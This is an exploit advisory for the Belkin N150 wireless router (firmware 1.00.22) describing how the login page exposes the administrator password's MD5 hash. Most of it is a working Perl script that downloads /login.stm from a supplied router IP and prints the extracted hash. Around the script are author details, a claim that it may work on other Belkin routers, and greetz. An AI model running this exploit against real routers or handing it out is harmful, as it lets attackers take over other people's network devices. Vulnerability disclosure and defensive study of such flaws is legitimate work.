============================================ Belkin N150 Wireless MD5 Password Disclosure ============================================ Firmware Version : 1.00.22 (Aug 31 2010 14:36:01) Boot Version : 1.20 Hardware : F7D1301 v1 (01A) Author : Avinash Tangirala ====================== Vulnerability Details: ====================== The Router's web interface on default reveals the administrator password in MD5 hash thereby one can bypass the login completely. There is a similar exploit for Belkin G wireless router by aodrulez. Therefore this exploit might* work possibly on every Belkin router created :D. ========= Exploit : ========= #/usr/bin/perl use strict; use LWP::Simple; print "\n 'Belkin N150 Wireless Router' Admin Exploit "; print "\n ---------------------------------------------\n\n"; print "[+] Enter the Router's IP Address : "; my $ip=<STDIN>; chomp($ip); $ip=get("http://".$ip."/login.stm") or die "\n[!] check ip and try again \n"; my @arr=$ip =~ m/var password = "(.*)";/g; print "[+] Admin Password = ".@arr[0]." (MD5 Hash).\n"; ========== Greetz to: ========== 1.) Aodrulez : My Mentor 2.) Arkz 3.) neurotoxIN 4.) www.codeeleven.inБрой прочитания на тази страница: 1292
Belkin N150 Wireless Router Password Disclosure